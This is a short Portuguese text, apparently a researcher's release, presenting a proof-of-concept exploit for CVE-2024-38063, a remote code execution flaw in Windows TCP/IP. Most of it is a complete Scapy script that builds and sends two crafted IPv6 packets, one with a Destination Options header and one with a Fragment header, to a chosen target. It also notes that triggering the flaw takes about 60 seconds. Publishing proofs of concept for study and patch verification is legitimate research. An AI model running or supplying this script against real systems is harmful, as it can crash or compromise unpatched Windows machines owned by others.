
Exploit de prova de conceito para CVE-2024-38063, uma vulnerabilidade de execução remota de código no TCP/IP do Windows acionada pelo envio de dois pacotes IPv6 manipulados com opções de destino e cabeçalhos de fragmento.
Em agosto de 2024, a Microsoft lançou uma correção para uma vulnerabilidade de Execução Remota de Código (RCE) no TCP/IP do Windows. Alguns pesquisadores já publicaram Provas de Conceito (PoC) para esta vulnerabilidade e, aproximadamente ao mesmo tempo, os pesquisadores da PatchPoint também concluíram sua análise e reprodução deste problema. Devido à disseminação de desinformação em várias plataformas, incluindo Twitter, parece que os pontos críticos necessários para acionar esta vulnerabilidade foram mal compreendidos. Contrariamente a essas imprecisões, decidimos lançar uma PoC que demonstra como esta vulnerabilidade pode ser acionada com a transmissão de apenas dois pacotes.; Na realidade, um grande número de pacotes não é necessário para acionar esta vulnerabilidade.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ Para acionar a vulnerabilidade, é necessário um tempo de espera de aproximadamente 60 segundos